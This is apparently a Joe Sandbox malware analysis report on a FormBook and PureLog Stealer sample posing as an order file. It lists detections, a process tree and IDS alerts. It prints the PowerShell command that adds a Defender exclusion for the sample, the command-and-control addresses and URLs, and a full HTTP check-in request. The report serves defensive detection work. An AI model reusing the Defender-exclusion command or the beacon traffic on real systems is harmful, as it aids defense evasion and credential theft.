Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER REF 47896798 PSMCO.exe

Overview

General Information

Sample name:ORDER REF 47896798 PSMCO.exe
Analysis ID:1585942
MD5:fa117772a94f43197a4632f47e78a56d
SHA1:717e83a352d1b81e9d5e3178f7d008c64a5e5efc
SHA256:51c1cf58f48a4cdad053a881d872925ec79a5a72f07d67a9b79bb13abaf636d3
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ORDER REF 47896798 PSMCO.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: FA117772A94F43197A4632F47E78A56D)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ORDER REF 47896798 PSMCO.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: FA117772A94F43197A4632F47E78A56D)
      • oDhSPGbJgMIIvl.exe (PID: 1476 cmdline: "C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Utilman.exe (PID: 3944 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)
          • oDhSPGbJgMIIvl.exe (PID: 2300 cmdline: "C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5612 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.ORDER REF 47896798 PSMCO.exe.40f9970.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ParentImage: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, ParentProcessId: 3568, ParentProcessName: ORDER REF 47896798 PSMCO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ParentImage: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, ParentProcessId: 3568, ParentProcessName: ORDER REF 47896798 PSMCO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ParentImage: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, ParentProcessId: 3568, ParentProcessName: ORDER REF 47896798 PSMCO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ProcessId: 3704, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T14:59:34.664991+010028554651A Network Trojan was detected192.168.2.649843192.186.58.3180TCP
                      2025-01-08T15:00:00.156795+010028554651A Network Trojan was detected192.168.2.649980154.213.39.6680TCP
                      2025-01-08T15:00:14.452661+010028554651A Network Trojan was detected192.168.2.64998447.83.1.9080TCP
                      2025-01-08T15:00:28.199834+010028554651A Network Trojan was detected192.168.2.649988104.21.53.16880TCP
                      2025-01-08T15:00:49.482147+010028554651A Network Trojan was detected192.168.2.649992199.59.243.22880TCP
                      2025-01-08T15:01:11.571070+010028554651A Network Trojan was detected192.168.2.649996194.58.112.17480TCP
                      2025-01-08T15:01:24.877969+010028554651A Network Trojan was detected192.168.2.650000199.192.21.16980TCP
                      2025-01-08T15:01:38.065872+010028554651A Network Trojan was detected192.168.2.650004192.64.119.10980TCP
                      2025-01-08T15:01:52.254607+010028554651A Network Trojan was detected192.168.2.65000813.248.169.4880TCP
                      2025-01-08T15:02:08.109441+010028554651A Network Trojan was detected192.168.2.650012103.247.11.20480TCP
                      2025-01-08T15:02:49.664886+010028554651A Network Trojan was detected192.168.2.650013192.186.58.3180TCP
                      2025-01-08T15:03:04.648395+010028554651A Network Trojan was detected192.168.2.650017154.213.39.6680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T14:59:52.191623+010028554641A Network Trojan was detected192.168.2.649955154.213.39.6680TCP
                      2025-01-08T14:59:54.737892+010028554641A Network Trojan was detected192.168.2.649971154.213.39.6680TCP
                      2025-01-08T14:59:57.587982+010028554641A Network Trojan was detected192.168.2.649979154.213.39.6680TCP
                      2025-01-08T15:00:06.710081+010028554641A Network Trojan was detected192.168.2.64998147.83.1.9080TCP
                      2025-01-08T15:00:09.257176+010028554641A Network Trojan was detected192.168.2.64998247.83.1.9080TCP
                      2025-01-08T15:00:11.803811+010028554641A Network Trojan was detected192.168.2.64998347.83.1.9080TCP
                      2025-01-08T15:00:20.490072+010028554641A Network Trojan was detected192.168.2.649985104.21.53.16880TCP
                      2025-01-08T15:00:23.116674+010028554641A Network Trojan was detected192.168.2.649986104.21.53.16880TCP
                      2025-01-08T15:00:25.668710+010028554641A Network Trojan was detected192.168.2.649987104.21.53.16880TCP
                      2025-01-08T15:00:41.857618+010028554641A Network Trojan was detected192.168.2.649989199.59.243.22880TCP
                      2025-01-08T15:00:44.388284+010028554641A Network Trojan was detected192.168.2.649990199.59.243.22880TCP
                      2025-01-08T15:00:46.931953+010028554641A Network Trojan was detected192.168.2.649991199.59.243.22880TCP
                      2025-01-08T15:01:03.479513+010028554641A Network Trojan was detected192.168.2.649993194.58.112.17480TCP
                      2025-01-08T15:01:06.408818+010028554641A Network Trojan was detected192.168.2.649994194.58.112.17480TCP
                      2025-01-08T15:01:09.002599+010028554641A Network Trojan was detected192.168.2.649995194.58.112.17480TCP
                      2025-01-08T15:01:17.211294+010028554641A Network Trojan was detected192.168.2.649997199.192.21.16980TCP
                      2025-01-08T15:01:19.775685+010028554641A Network Trojan was detected192.168.2.649998199.192.21.16980TCP
                      2025-01-08T15:01:23.191761+010028554641A Network Trojan was detected192.168.2.649999199.192.21.16980TCP
                      2025-01-08T15:01:30.427968+010028554641A Network Trojan was detected192.168.2.650001192.64.119.10980TCP
                      2025-01-08T15:01:32.966574+010028554641A Network Trojan was detected192.168.2.650002192.64.119.10980TCP
                      2025-01-08T15:01:35.619610+010028554641A Network Trojan was detected192.168.2.650003192.64.119.10980TCP
                      2025-01-08T15:01:43.592669+010028554641A Network Trojan was detected192.168.2.65000513.248.169.4880TCP
                      2025-01-08T15:01:47.179389+010028554641A Network Trojan was detected192.168.2.65000613.248.169.4880TCP
                      2025-01-08T15:01:49.741610+010028554641A Network Trojan was detected192.168.2.65000713.248.169.4880TCP
                      2025-01-08T15:02:00.153796+010028554641A Network Trojan was detected192.168.2.650009103.247.11.20480TCP
                      2025-01-08T15:02:02.760546+010028554641A Network Trojan was detected192.168.2.650010103.247.11.20480TCP
                      2025-01-08T15:02:05.517448+010028554641A Network Trojan was detected192.168.2.650011103.247.11.20480TCP
                      2025-01-08T15:02:56.720351+010028554641A Network Trojan was detected192.168.2.650014154.213.39.6680TCP
                      2025-01-08T15:02:59.365461+010028554641A Network Trojan was detected192.168.2.650015154.213.39.6680TCP
                      2025-01-08T15:03:02.605311+010028554641A Network Trojan was detected192.168.2.650016154.213.39.6680TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: ORDER REF 47896798 PSMCO.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://www.f5jh81t3k1w8.sbs/cu07/Avira URL Cloud: Label: malware
                      Source: http://www.f5jh81t3k1w8.sbs/cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4HAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: ORDER REF 47896798 PSMCO.exeVirustotal: Detection: 48%Perma Link
                      Source: ORDER REF 47896798 PSMCO.exeReversingLabs: Detection: 52%
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: ORDER REF 47896798 PSMCO.exeJoe Sandbox ML: detected
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Utilman.pdb source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215812419.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4557525430.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: ORDER REF 47896798 PSMCO.exe, ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Utilman.pdbGCTL source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0321C830 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C830
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_07837896
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 4x nop then xor eax, eax7_2_03209F80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 4x nop then mov ebx, 00000004h7_2_054004E8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49843 -> 192.186.58.31:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49971 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49984 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49981 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49980 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 192.186.58.31:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49979 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49982 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49992 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 154.213.39.66:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.solidf.xyz
                      Source: DNS query: www.laduta.xyz
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
